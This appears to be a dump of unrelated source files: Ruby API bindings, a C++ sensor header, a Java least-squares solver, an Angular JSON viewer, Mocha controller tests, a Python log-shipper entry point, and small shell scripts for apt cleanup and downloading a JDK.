property :total_review_count, as: 'totalReviewCount'
end
end
class Location
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :ad_words_location_extensions, as: 'adWordsLocationExtensions', class: Google::Apis::MybusinessV3::AdWordsLocationExtensions, decorator: Google::Apis::MybusinessV3::AdWordsLocationExtensions::Representation
collection :additional_categories, as: 'additionalCategories', class: Google::Apis::MybusinessV3::Category, decorator: Google::Apis::MybusinessV3::Category::Representation
collection :additional_phones, as: 'additionalPhones'
property :address, as: 'address', class: Google::Apis::MybusinessV3::Address, decorator: Google::Apis::MybusinessV3::Address::Representation
collection :attributes, as: 'attributes', class: Google::Apis::MybusinessV3::Attribute, decorator: Google::Apis::MybusinessV3::Attribute::Representation
collection :labels, as: 'labels'
property :latlng, as: 'latlng', class: Google::Apis::MybusinessV3::LatLng, decorator: Google::Apis::MybusinessV3::LatLng::Representation
property :location_key, as: 'locationKey', class: Google::Apis::MybusinessV3::LocationKey, decorator: Google::Apis::MybusinessV3::LocationKey::Representation
property :location_name, as: 'locationName'
property :location_state, as: 'locationState', class: Google::Apis::MybusinessV3::LocationState, decorator: Google::Apis::MybusinessV3::LocationState::Representation
property :metadata, as: 'metadata', class: Google::Apis::MybusinessV3::Metadata, decorator: Google::Apis::MybusinessV3::Metadata::Representation
property :name, as: 'name'
property :open_info, as: 'openInfo', class: Google::Apis::MybusinessV3::OpenInfo, decorator: Google::Apis::MybusinessV3::OpenInfo::Representation
property :photos, as: 'photos', class: Google::Apis::MybusinessV3::Photos, decorator: Google::Apis::MybusinessV3::Photos::Representation
property :primary_category, as: 'primaryCategory', class: Google::Apis::MybusinessV3::Category, decorator: Google::Apis::MybusinessV3::Category::Representation
property :primary_phone, as: 'primaryPhone'
property :regular_hours, as: 'regularHours', class: Google::Apis::MybusinessV3::BusinessHours, decorator: Google::Apis::MybusinessV3::BusinessHours::Representation
property :service_area, as: 'serviceArea', class: Google::Apis::MybusinessV3::ServiceAreaBusiness, decorator: Google::Apis::MybusinessV3::ServiceAreaBusiness::Representation
property :special_hours, as: 'specialHours', class: Google::Apis::MybusinessV3::SpecialHours, decorator: Google::Apis::MybusinessV3::SpecialHours::Representation
property :store_code, as: 'storeCode'
property :website_url, as: 'websiteUrl'
end
end
class LocationKey
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :explicit_no_place_id, as: 'explicitNoPlaceId'
property :place_id, as: 'placeId'
property :plus_page_id, as: 'plusPageId'
end
end
class LocationState
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :can_delete, as: 'canDelete'
property :can_update, as: 'canUpdate'
property :is_duplicate, as: 'isDuplicate'
property :is_google_updated, as: 'isGoogleUpdated'
property :is_suspended, as: 'isSuspended'
property :is_verified, as: 'isVerified'
property :needs_reverification, as: 'needsReverification'
end
end
class MatchedLocation
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :is_exact_match, as: 'isExactMatch'
property :location, as: 'location', class: Google::Apis::MybusinessV3::Location, decorator: Google::Apis::MybusinessV3::Location::Representation
end
end
class Metadata
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :duplicate, as: 'duplicate', class: Google::Apis::MybusinessV3::Duplicate, decorator: Google::Apis::MybusinessV3::Duplicate::Representation
end
end
class OpenInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :status, as: 'status'
end
end
class Photos
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :additional_photo_urls, as: 'additionalPhotoUrls'
collection :common_areas_photo_urls, as: 'commonAreasPhotoUrls'
property :cover_photo_url, as: 'coverPhotoUrl'
collection :exterior_photo_urls, as: 'exteriorPhotoUrls'
collection :food_and_drink_photo_urls, as: 'foodAndDrinkPhotoUrls'
collection :interior_photo_urls, as: 'interiorPhotoUrls'
property :logo_photo_url, as: 'logoPhotoUrl'
collection :menu_photo_urls, as: 'menuPhotoUrls'
collection :photos_at_work_urls, as: 'photosAtWorkUrls'
property :preferred_photo, as: 'preferredPhoto'
collection :product_photo_urls, as: 'productPhotoUrls'
property :profile_photo_url, as: 'profilePhotoUrl'
collection :rooms_photo_urls, as: 'roomsPhotoUrls'
collection :team_photo_urls, as: 'teamPhotoUrls'
end
end
class PlaceInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
property :place_id, as: 'placeId'
end
end
class Places
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :place_infos, as: 'placeInfos', class: Google::Apis::MybusinessV3::PlaceInfo, decorator: Google::Apis::MybusinessV3::PlaceInfo::Representation
end
end
class PointRadius
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :latlng, as: 'latlng', class: Google::Apis::MybusinessV3::LatLng, decorator: Google::Apis::MybusinessV3::LatLng::Representation
property :radius_km, as: 'radiusKm'
end
end
class Review
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :comment, as: 'comment'
property :create_time, as: 'createTime'
property :review_id, as: 'reviewId'
property :review_reply, as: 'reviewReply', class: Google::Apis::MybusinessV3::ReviewReply, decorator: Google::Apis::MybusinessV3::ReviewReply::Representation
property :reviewer, as: 'reviewer', class: Google::Apis::MybusinessV3::Reviewer, decorator: Google::Apis::MybusinessV3::Reviewer::Representation
property :star_rating, as: 'starRating'
property :update_time, as: 'updateTime'
end
end
class ReviewReply
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :comment, as: 'comment'
property :update_time, as: 'updateTime'
end
end
class Reviewer
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :display_name, as: 'displayName'
property :is_anonymous, as: 'isAnonymous'
end
end
class ServiceAreaBusiness
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :business_type, as: 'businessType'
property :places, as: 'places', class: Google::Apis::MybusinessV3::Places, decorator: Google::Apis::MybusinessV3::Places::Representation
property :radius, as: 'radius', class: Google::Apis::MybusinessV3::PointRadius, decorator: Google::Apis::MybusinessV3::PointRadius::Representation
end
end
class SpecialHourPeriod
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :close_time, as: 'closeTime'
property :end_date, as: 'endDate', class: Google::Apis::MybusinessV3::Date, decorator: Google::Apis::MybusinessV3::Date::Representation
property :is_closed, as: 'isClosed'
property :open_time, as: 'openTime'
property :start_date, as: 'startDate', class: Google::Apis::MybusinessV3::Date, decorator: Google::Apis::MybusinessV3::Date::Representation
end
end
class SpecialHours
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :special_hour_periods, as: 'specialHourPeriods', class: Google::Apis::MybusinessV3::SpecialHourPeriod, decorator: Google::Apis::MybusinessV3::SpecialHourPeriod::Representation
end
end
class TimePeriod
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :close_day, as: 'closeDay'
property :close_time, as: 'closeTime'
property :open_day, as: 'openDay'
property :open_time, as: 'openTime'
end
end
class TransferLocationRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :to_account, as: 'toAccount'
end
end
end
end
end
|
#!/bin/bash
# A little helper to manually clean Ubuntu/Debian machines after updates
UNAME=$(uname | tr "[:upper:]" "[:lower:]")
if [ "$UNAME" == "linux" ]; then
sudo apt autoclean && sudo apt autoremove
else
echo "You're not in Linux, you're in $UNAME"
fi
|
<reponame>raja-ravi-prakash/website<filename>src/environments/environment.prod.ts
import { git } from './token';
export const environment = {
production: true,
git: git.key,
};
|
<filename>src/shared/sensors/BMX160/BMX160WithCorrectionData.h
/* Copyright (c) 2021 Skyward Experimental Rocketry
* Authors: <NAME>, <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#pragma once
#include "sensors/BMX160/BMX160Data.h"
struct BMX160WithCorrectionData : public BMX160Data
{
BMX160WithCorrectionData() : BMX160Data() {}
BMX160WithCorrectionData(const BMX160Data& data)
: BMX160WithCorrectionData(data, data, data)
{
}
BMX160WithCorrectionData(AccelerometerData acc, GyroscopeData gyr,
MagnetometerData mag)
: BMX160Data(acc, gyr, mag)
{
}
BMX160WithCorrectionData& operator=(AccelerometerData acc)
{
accel_x = acc.accel_x;
accel_y = acc.accel_y;
accel_z = acc.accel_z;
return *this;
}
BMX160WithCorrectionData& operator=(GyroscopeData gyr)
{
gyro_x = gyr.gyro_x;
gyro_y = gyr.gyro_y;
gyro_z = gyr.gyro_z;
return *this;
}
BMX160WithCorrectionData& operator=(MagnetometerData mag)
{
mag_x = mag.mag_x;
mag_y = mag.mag_y;
mag_z = mag.mag_z;
return *this;
}
static std::string header()
{
return "accel_timestamp,accel_x,accel_y,accel_z,gyro_timestamp,gyro_x,"
"gyro_y,"
"gyro_z,mag_timestamp,mag_x,mag_y,mag_z\n";
}
void print(std::ostream& os) const
{
os << accel_timestamp << "," << accel_x << "," << accel_y << ","
<< accel_z << "," << gyro_timestamp << "," << gyro_x << "," << gyro_y
<< "," << gyro_z << "," << mag_timestamp << "," << mag_x << ","
<< mag_y << "," << mag_z << "\n";
}
};
struct BMX160GyroscopeCalibrationBiases
{
float bx;
float by;
float bz;
BMX160GyroscopeCalibrationBiases() {}
BMX160GyroscopeCalibrationBiases(float x, float y, float z)
: bx(x), by(y), bz(z)
{
}
static std::string header()
{
return "bias_x,bias_y,bias_z\n";
}
void print(std::ostream& os) const
{
os << bx << "," << by << "," << bz << "\n";
}
};
|
<reponame>arthurcnorman/general
mergeInto(LibraryManager.library, {
web_async_read: function () {
return Asyncify.handleAsync(async () => {
// out("waiting for input");
const char = await read_char_promise();
// out(char);
return char;
});
},
web_async_write: function (char) {
// console.log('async write called: ')
// out(intArrayToString([char]));
outputBuf.push(char);
if (intArrayToString([char]) === '\n') {
term.write(outputBuf);
outputBuf = [];
}
return 0;
},
web_async_info_write: function (char) {
out(`read char: ${char}, ${intArrayToString([char])}`);
return 0;
}
});
|
/* eslint-disable */
(function() {
'use strict';
angular.module('raws')
.directive('jsonViewer', jsonViewer);
jsonViewer.$inject = ['dataService'];
function jsonViewer(dataService) {
return {
scope: {
json: "=",
onSelect: "="
},
link: function postLink(scope, element, attrs) {
scope.$watch('json', function(json) {
update();
})
function update() {
d3.select(element[0]).selectAll("*").remove();
var tree = d3.select(element[0])
.append("div")
.classed("json-node", "true")
var j = scope.json;
explore(j, tree);
function explore(m, el) {
if (el === tree && is.object(m) && is.not.array(m) && is.not.empty(m)) {
el.append("div")
// .classed("json-node","true")
.text(function(d) {
return "{";
})
}
var n = el === tree && is.array(m) && is.not.empty(m) ? [m] : m;
for (var c in n) {
var cel = el.append("div")
.datum(n[c]) //function(d){console.log(el === tree, n); return el === tree ? {tree:n} : n[c]})
.classed("json-node", "true")
if (is.array(n[c]) && is.not.empty(n[c])) {
cel.classed("json-closed", function(d) {
return el === tree ? "false" : "true"
})
cel.classed("json-array", function(d) {
return el === tree ? "false" : "true"
})
//data-toggle="tooltip"
//data-title="Clear all"
cel.append("i")
.classed("json-icon fa fa-plus-square-o pull-left", "true")
.on("click", function(d) {
d3.event.stopPropagation();
d3.select(this.parentNode).classed("json-closed", function() {
return !d3.select(this).classed("json-closed");
})
d3.select(this).classed("fa-plus-square-o", d3.select(this.parentNode).classed("json-closed"))
d3.select(this).classed("fa-minus-square-o", !d3.select(this.parentNode).classed("json-closed"))
})
}
cel.append("div")
.html(function(d) {
var pre = is.array(n) ? "" : "<b>" + c + "</b> : ";
var text = is.array(n[c]) ? "[" : is.object(n[c]) ? "{" : n[c];
text += is.array(n[c]) && !n[c].length ? "]" : is.object(n[c]) && is.empty(n[c]) ? "}" : "";
return pre + text;
})
if (is.object(n[c])) explore(n[c], cel);
}
if (is.array(n) && el !== tree) {
el.select('div')
.attr("data-toggle", "tooltip")
.attr("data-title", function(d) {
return "Load " + d.length + " records";
})
.on("mouseover", function(d) {
d3.event.stopPropagation();
d3.select(this.parentNode).classed("json-hover", true)
})
.on("mouseout", function(d) {
d3.event.stopPropagation();
d3.select(this.parentNode).classed("json-hover", false)
})
.on("click", function(d) {
d3.event.stopPropagation();
scope.onSelect(d);
})
}
if (is.object(n) && is.not.empty(n)) {
if (is.array(n) && el === tree) return;
el.append("div")
// .classed("json-node","true")
.text(function(d) {
var text = is.array(n) ? "]" : "}";
return text;
})
}
$('[data-toggle="tooltip"]').tooltip({
animation: false
});
}
}
}
};
}
}());
|
<gh_stars>0
package br.univali.model.minimos_quadrados;
import br.univali.model.gauss.Sistema;
import java.util.*;
public class MinimosQuadrados {
private List<Point> points;
private int grau;
private Double[] as;
private Double[] vectorY;
List<Double[]> vectors;
private Double[][]matrizInicial;
private Double[][]matrizEscalonada;
public Double[][] getMatrizInicial() {
return matrizInicial;
}
public Double[][] getMatrizEscalonada() {
return matrizEscalonada;
}
public MinimosQuadrados(List<Point> points, int grau, String tipoAproximacao) {
this.points = points;
this.grau=grau;
this.vectors = new ArrayList<>();
if(tipoAproximacao.equals("Polinomial"))
{
calcularPolinomial();
}
else if(tipoAproximacao.equals("Geométrica"))
{
calcularGeometrica();
}
else if(tipoAproximacao.equals("ae^bx"))
{
calcular_aebx();
}
}
private void calcularPolinomial()
{
for (int i = 0; i < this.grau+1; i++) {
Double[] ui = new Double[points.size()];
for (int j = 0; j < points.size(); j++) {
ui[j]=Math.pow(points.get(j).getX(),i);
}
vectors.add(ui);
}
this.vectorY = new Double[points.size()];
for (int i = 0; i < points.size(); i++) {
vectorY[i]=points.get(i).getY();
}
calcular();
}
private void calcularGeometrica()
{
Double[] u0 = new Double[points.size()];
for (int j = 0; j < points.size(); j++) {
u0[j]=1.0;
}
vectors.add(u0);
for (int i = 1; i < this.grau+1; i++) {
Double[] ui = new Double[points.size()];
for (int j = 0; j < points.size(); j++) {
ui[j]=Math.log(points.get(j).getX());
}
vectors.add(ui);
}
this.vectorY = new Double[points.size()];
for (int i = 0; i < points.size(); i++) {
vectorY[i]=Math.log(points.get(i).getY());
}
calcular();
this.as[0]=Math.exp(this.as[0]);
}
private void calcular_aebx()
{
Double[] u0 = new Double[points.size()];
for (int j = 0; j < points.size(); j++) {
u0[j]=1.0;
}
vectors.add(u0);
for (int i = 1; i < this.grau+1; i++) {
Double[] ui = new Double[points.size()];
for (int j = 0; j < points.size(); j++) {
ui[j]=points.get(j).getX();
}
vectors.add(ui);
}
this.vectorY = new Double[points.size()];
for (int i = 0; i < points.size(); i++) {
vectorY[i]=Math.log(points.get(i).getY());
}
calcular();
this.as[0]=Math.log(this.as[0]);
}
private void calcular() {
Double[][] ampliedMatrix = new Double[this.grau+1][this.grau+2];
for (int i = 0; i < this.grau+1; i++) {
for (int j = 0; j < this.grau+1; j++) {
ampliedMatrix[i][j]=addVectors(vectors.get(i), vectors.get(j));
}
}
for (int i = 0; i < this.grau+1; i++) {
ampliedMatrix[i][this.grau+1]=addVectors(vectors.get(i), vectorY);
}
this.matrizInicial = new Double[ampliedMatrix.length][ampliedMatrix[0].length];
for(int i=0; i<ampliedMatrix.length;i++){
for (int j = 0; j < ampliedMatrix[0].length; j++) {
this.matrizInicial[i][j]=ampliedMatrix[i][j];
}
}
Sistema sistema = new Sistema(ampliedMatrix);
this.as = sistema.getVetorSolucao();
this.matrizEscalonada = sistema.getMatriz();
}
private Double addVectors(Double[] vectA, Double[] vectB){
Double sum=0.0;
for (int i = 0; i < vectA.length; i++) {
sum+=vectA[i]*vectB[i];
}
return sum;
}
public Double[] getList()
{
return as;
}
}
|
<filename>lib/permutations.rb
def permutations?(string1, string2)
word_hash = {}
string1.split("").each do |letter|
if word_hash[letter] == nil
word_hash[letter] = 1
else
word_hash[letter] += 1
end
end
string2.split("").each do |letter|
if word_hash[letter] == nil
return false
else
word_hash[letter] -= 1
end
end
word_hash.each_value do |times|
if times != 0
return false
end
end
return true
end
|
<filename>test/controllers/consul/consul.get.controller.spec.js
const { describe, it } = require('eslint/lib/testers/event-generator-tester');
const { before, after } = require('mocha');
const expect = require('expect.js');
const sinon = require('sinon');
const request = require('supertest-as-promised');
const httpStatus = require('http-status');
const ConsulService = require('../../../app/services/consul.service');
const PermissionModel = require('../../../app/models/permission.model');
const PROJECTS = require('../../fixtures/projects.json');
const app = require('../../../server').app;
const loginHelpers = require('../../helpers/login');
const USER = require('../../fixtures/user.json');
describe('ConsulController', () => {
let token = null;
before((done) => {
sinon.stub(PermissionModel, 'getUserProjects').resolves(PROJECTS);
loginHelpers.createUser(USER)
.then(user => loginHelpers.getJWT(user.username))
.then(jwt => {
token = jwt;
done();
});
});
after((done) => {
PermissionModel.getUserProjects.restore();
loginHelpers.deleteUser(USER.username)
.then(() => {
token = null;
done();
});
});
describe('get()', () => {
const VALUES = require('../../fixtures/consul/consul-values.json');
it('should return unauthorized status', (done) => {
const stub = sinon.stub(ConsulService, 'get').resolves(VALUES);
request(app)
.get('/consul/kv/values/CLOUD/console-server')
.expect(httpStatus.UNAUTHORIZED)
.then(() => {
stub.restore();
done();
})
.catch((err) => {
stub.restore();
done(err);
});
});
it('should return 401 status', (done) => {
const stub = sinon.stub(ConsulService, 'get').rejects('error');
request(app)
.get('/consul/kv/values/key')
.set('token', token)
.expect(httpStatus.UNAUTHORIZED)
.then(() => {
stub.restore();
done();
})
.catch((err) => {
stub.restore();
done(err);
});
});
it('should return error if secret key', (done) => {
const stub = sinon.stub(ConsulService, 'get').resolves(VALUES);
request(app)
.get('/consul/kv/values/CLOUD/console-server/.secret-key')
.set('token', token)
.expect(httpStatus.INTERNAL_SERVER_ERROR)
.then(() => {
stub.restore();
done();
})
.catch((err) => {
stub.restore();
done(err);
});
});
it('should return error if ending with slash', (done) => {
const stub = sinon.stub(ConsulService, 'get').resolves(VALUES);
request(app)
.get('/consul/kv/values/CLOUD/console-server/')
.set('token', token)
.expect(httpStatus.INTERNAL_SERVER_ERROR)
.then(() => {
stub.restore();
done();
})
.catch((err) => {
stub.restore();
done(err);
});
});
it('should return values', (done) => {
const stub = sinon.stub(ConsulService, 'get').resolves(VALUES);
request(app)
.get('/consul/kv/values/CLOUD/console-server/config.json')
.set('token', token)
.expect(httpStatus.OK)
.then((res) => {
expect(stub.getCall(0).args).to.eql(['CLOUD/console-server/config.json']);
expect(res.body.result).to.equal(true);
expect(res.body.data).to.eql(VALUES);
stub.restore();
done();
})
.catch((err) => {
stub.restore();
done(err);
});
});
});
});
|
import React, { Component, Fragment } from 'react';
import ReactDOM from 'react-dom';
import Header from './layout/Header';
import DashBoard from './businesses/Dashboard';
class App extends Component {
render() {
return (
<div className="container">
<Header />
<div className="container">
<DashBoard />
</div>
</div>
)
}
}
ReactDOM.render(<App />, document.getElementById('app'));
|
import numpy as np
def filterData(input_data):
processed_data = []
stdev = np.std(input_data)
med = np.median(input_data)
# Calculate the median of the input data
for val in input_data:
score = abs(val - med)
if score < 500:
processed_data.append(val)
# Uncomment the following section to include values based on z-score threshold
# avg = np.mean(input_data)
# threshold = 2 # Set the z-score threshold value
# for val in input_data:
# z_score = abs((val - avg) / stdev)
# if z_score < threshold:
# processed_data.append(val)
return processed_data
|
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package models;
import java.util.List;
import java.io.File;
import java.io.FileNotFoundException;
import java.util.Scanner;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.swing.AbstractListModel;
/**
*
* @author pretizy
*/
public class ChapterModel extends AbstractListModel {
//create instance variables
private static final long serialVersionUID = 1L;
private BookModel book;
private int chapter;
private Scanner scan;
private int c_count;
private List<String> list;
//fake sample data
private String[] strings;
//constructor with String parameter
public ChapterModel(BookModel book, int chapter) {
try {
//write code to use book value to initialize the begining state of the chapter UI //
this.chapter= chapter;
this.book = book;
this.scan=new Scanner(new File("Old Testament\\"+BookModel.old[0][0]+".txt"));
c_count = Integer.parseInt(BookModel.old[0][1]);
String[] chap = new String[c_count];
for (int y = c_count - 1; y >= 0; y--) {
chap[y] = "Chapter " + c_count;
c_count--;
}
//assign new array to strings
strings = chap;
} catch (FileNotFoundException ex) {
Logger.getLogger(ChapterModel.class.getName()).log(Level.SEVERE, null, ex);
}
}
public BookModel getBook() {
return book;
}
public int getChapter() {
return chapter;
}
public void setChapter(int chapter, BookModel book) {
try {
this.chapter = chapter;
this.book = book;
//check to see the current testament
if (getBook().getTestament().equals("old")) {
scan = new Scanner(new File("Old Testament\\" + BookModel.old[getBook().getIndex()][0] + ".txt"));
c_count = Integer.parseInt(BookModel.old[getBook().getIndex()][1]);
}
} catch (FileNotFoundException ex) {
Logger.getLogger(ChapterModel.class.getName()).log(Level.SEVERE, null, ex);
}
//generate test data to test the app
String[] chap = new String[c_count];
for (int y = c_count - 1; y >= 0; y--) {
chap[y] = "Chapter " + c_count;
c_count--;
}
//assign new array to strings
strings = chap;
//change the UI whenever a different book is selected
this.fireContentsChanged(this, 0, strings.length);
}
public Scanner getScan() {
return scan;
}
//return size of the list
public int getSize() {
return strings.length;
}
public Object getElementAt(int index) {
//write code to implement which chapter to be returned here.
return strings[index];
}
}
|
# # testing scenario 1 without multiprocessing
# python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_out
#
# # testing scenario 2 with multiprocessing
# python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_out -multiprocess
#
# # testing scenario 3 null without multiprocessing
# python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_out -perturb data/perturb_score.txt.gz -null
#
# # testing scenario 4 null with multiprocessing
# python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_out -perturb data/perturb_score.txt.gz -null -multiprocess
# testing tfwrapper
../script/analysis/tfwrapper_paramsrunner.sh python ../script/run_epee_v0.1.4.3.py --conditiona data/CD4_Naive.txt.gz --conditionb data/CD4_Th2.txt.gz --networka data/cd4+_t_cells.txt.gz --networkb data/cd4+_t_cells.txt.gz -r 2 -i 100 -prefix test_tfwrapper
|
func sumOfEvenNumbers(_ numbers: [Int]) -> Int {
var sum = 0
for number in numbers {
if number % 2 == 0 {
sum += number
}
}
return sum
}
// Test the function
let numbers = [1, 2, 3, 4, 5, 6]
let result = sumOfEvenNumbers(numbers)
print(result) // Output: 12
|
<gh_stars>1-10
/*
* Copyright (C) 2018 iFLYTEK CO.,LTD.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.iflytek.cyber.inspector;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.preference.PreferenceManager;
import android.support.annotation.NonNull;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.support.v7.app.AppCompatActivity;
import com.iflytek.cyber.inspector.setup.WelcomeFragment;
import com.iflytek.cyber.platform.AuthManager;
import com.iflytek.cyber.platform.DefaultTokenStorage;
import com.iflytek.cyber.platform.TokenManager;
import static android.Manifest.permission.RECORD_AUDIO;
import static android.content.pm.PackageManager.PERMISSION_GRANTED;
public class LauncherActivity extends AppCompatActivity {
private AuthManager authManager;
private TokenManager tokenManager;
private SharedPreferences pref;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
pref = PreferenceManager.getDefaultSharedPreferences(this);
updateClientId();
initMainFragment();
if (checkSelfPermission(RECORD_AUDIO) == PERMISSION_GRANTED) {
initMainFragment();
} else {
requestPermission();
}
}
private void requestPermission() {
requestPermissions(new String[]{RECORD_AUDIO}, 1);
}
@Override
public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions,
@NonNull int[] grantResults) {
if (grantResults[0] == PERMISSION_GRANTED) {
initMainFragment();
} else {
requestPermission();
}
super.onRequestPermissionsResult(requestCode, permissions, grantResults);
}
@Override
protected void onDestroy() {
super.onDestroy();
if (authManager != null) {
authManager.cancel();
}
if (tokenManager != null) {
tokenManager.destroy();
}
}
public void updateClientId() {
if (authManager != null) {
authManager.cancel();
}
if (tokenManager != null) {
tokenManager.destroy();
}
authManager = new AuthManager(pref.getString("client_id", null));
tokenManager = new TokenManager(new DefaultTokenStorage(this), authManager);
}
public void initMainFragment() {
if (tokenManager.hasToken()) {
redirectTo(new MainFragment());
} else {
redirectTo(new WelcomeFragment());
}
}
public void redirectTo(Fragment fragment) {
getSupportFragmentManager().popBackStackImmediate(
null, FragmentManager.POP_BACK_STACK_INCLUSIVE);
getSupportFragmentManager().beginTransaction()
.replace(R.id.container, fragment)
.commit();
}
public void navigateTo(Fragment fragment) {
getSupportFragmentManager().beginTransaction()
.replace(R.id.container, fragment)
.addToBackStack(null)
.commit();
}
@Override
public void onBackPressed() {
super.onBackPressed();
getSupportFragmentManager().popBackStack();
}
public void requestAuthorize(AuthManager.AuthorizeCallback callback) {
authManager.authorize(callback);
}
public void cancelAuthorize() {
authManager.cancel();
}
public void finishSetup(String accessToken, String refreshToken, long expiresAt,
String operateToken) {
tokenManager.updateToken(accessToken, refreshToken, expiresAt);
}
void debug_clearToken() {
tokenManager.clearToken();
initMainFragment();
}
void changeEndpoint() {
navigateTo(new EndpointFragment());
}
}
|
<filename>src/job/BillLinkFetchJob.js
const Actions = require('@action')
const AbstractJob = require('./Job').AbstractJob
const FetchAction = Actions.FetchAction
const FormatAction = Actions.BillLinkFetchAdapterAction
const TextParserAction = Actions.TextParserAction
const SelectionAction = Actions.SelectionAction
const ErrorHandler = Actions.HandleConnectionErrorAction
class BillLinkFetchJob extends AbstractJob {
// eslint-disable-next-line no-useless-constructor
constructor (params, callback) {
super(params, callback)
this.params = params
}
static create (params, callback) {
return new BillLinkFetchJob(params, callback)
.addAction(new FetchAction(AbstractJob.createRequestParams(params)))
.addAction(new TextParserAction(false, 'a', (elem, $) => {
return $(elem).attr('href')
}))
.addAction(new SelectionAction('/Content/Bills/'))
.addAction(new SelectionAction('PDF'))
.addAction(new FormatAction(params))
.addErrorAction(new ErrorHandler(callback, BillLinkFetchJob.create, params))
}
}
module.exports.BillLinkFetchJob = BillLinkFetchJob
|
#include <iostream>
using namespace std;
//function to reverese the given array
void reverse(int arr[], int start, int end)
{
while (start < end)
{
int temp = arr[start];
arr[start] = arr[end];
arr[end] = temp;
start++;
end--;
}
}
int main()
{
int arr[] = {1, 2, 3, 4};
int n = sizeof(arr)/sizeof(arr[0]);
reverse(arr, 0, n-1);
for (int i=0; i < n; i++)
cout << arr[i] << " ";
return 0;
}
|
from lsshipper.common.config import prepare_config
import asyncio
import signal
from functools import partial
import logging
import logging.config
from .common.state import State
from lsshipper.uploaders import Uploader, OneTimeUploader
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
signal_times = 0
logger = logging.getLogger('general')
def got_int_signal(state, signum, frame):
global signal_times
signal_times += 1
logger.info("got term signal")
state.shutdown()
if signal_times > 1:
logger.info("got term signal second time. Going to kill main loop")
state.loop.close()
def main():
config = prepare_config()
loop = asyncio.get_event_loop()
state = State(loop)
if config['general']['run-once']:
uploader = OneTimeUploader(loop=loop, state=state, config=config)
else:
uploader = Uploader(loop=loop, state=state, config=config)
task = asyncio.ensure_future(uploader.start())
signal.signal(signal.SIGINT, partial(got_int_signal, state))
signal.signal(signal.SIGTERM, partial(got_int_signal, state))
try:
loop.run_until_complete(task)
except KeyboardInterrupt as e:
logger.info("process stopped by keyboard interrupt")
|
#!/bin/bash
set -e
JAVA_TARGET_LOCATION="/usr/java"
export JAVA_DOWNLOAD_URL=${JAVA_DOWNLOAD_URL:-"http://download.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-x64.tar.gz"}
JAVA_HOME=$TARGET_ROOT$JAVA_TARGET_LOCATION
mkdir -p $JAVA_HOME
JAVA_FILE=$(basename $JAVA_DOWNLOAD_URL)
wget --no-check-certificate --no-cookies -c \
--header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" \
-O $JAVA_HOME/$JAVA_FILE $JAVA_DOWNLOAD_URL
if [ $? -eq 0 ]; then
echo "Java download successful"
else
echo "Error downloading $JAVA_DOWNLOAD_URL, exiting"
exit 1
fi
cd $JAVA_HOME
